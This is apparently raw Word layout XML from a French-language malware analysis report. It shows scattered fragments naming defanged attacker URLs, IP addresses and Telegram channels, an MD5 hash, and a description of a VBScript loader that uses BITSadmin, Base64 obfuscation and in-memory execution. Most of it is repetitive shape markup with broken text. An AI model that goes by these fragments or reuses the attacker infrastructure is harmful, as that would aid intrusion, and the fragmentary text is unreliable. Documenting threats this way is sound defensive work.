              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2127515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179502" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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950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www.huaweicloud.com@e097.yggjf81487.worke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7296" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5916929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2131283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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CloudURL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83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2304045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11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fxpppscdlw-12-27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9344" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2304045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11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45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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">rs[.]dev/libertarian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03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2658375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1392" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2746640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6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exemption-transportation-kilometers-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24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2834905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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telegram[.]me/s/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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5916929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2838673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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CloudURL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4464" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2923170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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berkeley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54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3011435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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akatachi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65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3365765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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hxxps://check-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75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3542295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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host[.]net/ip-info?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8560" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3630560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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172.86.76[.]132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9584" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6039485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3634328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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33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IpURL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06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3718825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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45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host=snterval.sellto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16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3895355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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sell.ru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26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4249685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5861050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4347233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="841258" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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12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[aucune clé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4704" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4426215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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144.172.88[.]24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57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4426215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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telegram[.]me/s/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6752" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5861050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4520588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="415820" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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58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écrite]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77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4602745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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oberfarir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8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5200280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Remarque :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la chaîne </w:t>
                        </w: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exemption-transportation-kilometers-berkeley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est ajoutée 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9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5379985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2185553" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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55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domaine </w:t>
                        </w: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.trycloudflare[.]com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0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5664858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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fois l’extraction réussie à partir de l’une de ces sources,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envoie immédiatement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1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5838213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3737328" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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73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requête GET et enregistre l’URL active dans le registre.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2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6113168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Remarque :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 il convient de noter qu’une variante de cette première étape, qui utilise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6286523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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pratiquement les mêmes mécanismes, recourt à BITSadmin pour télécharger et exécuter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4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6459878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="936203" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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62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charges utiles.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5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6734833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Au cours de l'analyse, l'équipe de chercheurs a réussi à déclencher le mécanisme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6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6908188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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livraison</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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16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charge</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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utile</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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à</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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partir</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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endpoint</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="45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8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7078610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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hxxps://www.az.com@sweet.csxvl00328.workers[.]dev/vehis</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="31"/>
                          </w:rPr>
                          <w:t xml:space="preserve">. Cela a permis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9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7261248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4803023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3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récupérer un autre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VBScript conçu pour exécuter un deuxième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006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10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21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313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890304" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4453255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1654819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689613" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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61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9609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689609" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68960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2352" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3394074</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9456429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2130425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9456429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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542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2148837</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="6686550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="119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alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-18" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="6686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6686550">
                          <a:moveTo>
                            <a:pt x="0" y="6686550"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="6686550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668655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644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747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8496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955700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1153625" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3625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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.2.2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="18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2e stage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9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1268118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Le 23 janvier 2026, ils ont récupéré la deuxième étape (condensat MD5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0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1438540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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a2c6e01001c62f6198e31a9d603977c6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), qui peut être c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onsidérée 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comme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. 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1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1639793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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moment</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="17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3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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="17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3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l'analyse,</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="17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3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17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3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variable</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="41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CloudURL</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="47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renvoyait</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="17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3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2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1833510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4298833" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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988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hxxps://www.az.com@sweet.csxvl00328.workers[.]dev/vehis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3616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1713865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8811915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4171463" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1463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8 – Deuxième étape du loader pouvant être considérée comme un dropper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9064648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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utilise un encodage Base64, obfusqué par l'insertion de marqueurs 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&amp;&amp;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tous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5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9250068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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54 caractères. La p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remière étape déco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de ce blob et l'exécute directement en mémoire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6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9442038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2569093" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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09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l'aide de la fonction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ExecuteGlobal()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77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873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97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078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180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986560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1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5536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1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283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4526924</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="185419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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185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18541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85419"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1854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204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5897254</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3779519"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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77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779519">
                          <a:moveTo>
                            <a:pt x="0" y="3504564"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3504564"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3779519"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3779519"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3504564"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3229609"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3505199"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3505199"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3229609"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2781300"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2781300"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2506980"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2506980"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1894204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1894204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1894204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1445894"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1445894"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1894840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1894840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1445894"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="435610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1446530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1446530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16129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307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4526924</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="185419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1854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18541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85419"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1854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228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5897254</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3779519"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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77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779519">
                          <a:moveTo>
                            <a:pt x="0" y="3504564"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3504564"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3779519"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3779519"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3504564"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3229609"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3505199"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3505199"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3229609"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2781300"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3229609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2781300"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2506980"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2781300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2506980"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1894204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1894204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2506980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1894204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1445894"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1445894"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1894840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1894840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1445894"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="435610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1446530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1446530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16129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1744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4527559</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="184784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1847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184784">
                          <a:moveTo>
                            <a:pt x="3174" y="184784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184784"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="184784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="181609"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="181609"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="181609"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="181609"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="184784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3792" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3609974</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1621799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1692274</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1621799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7888" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3678555</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2020579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9936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2020579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1984" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6243954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3374399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3964305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3374399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="934723" cy="866140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4723" cy="8661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4719" h="866140">
                          <a:moveTo>
                            <a:pt x="0" y="666750"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="866140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="934719" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="934719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8128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4041149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
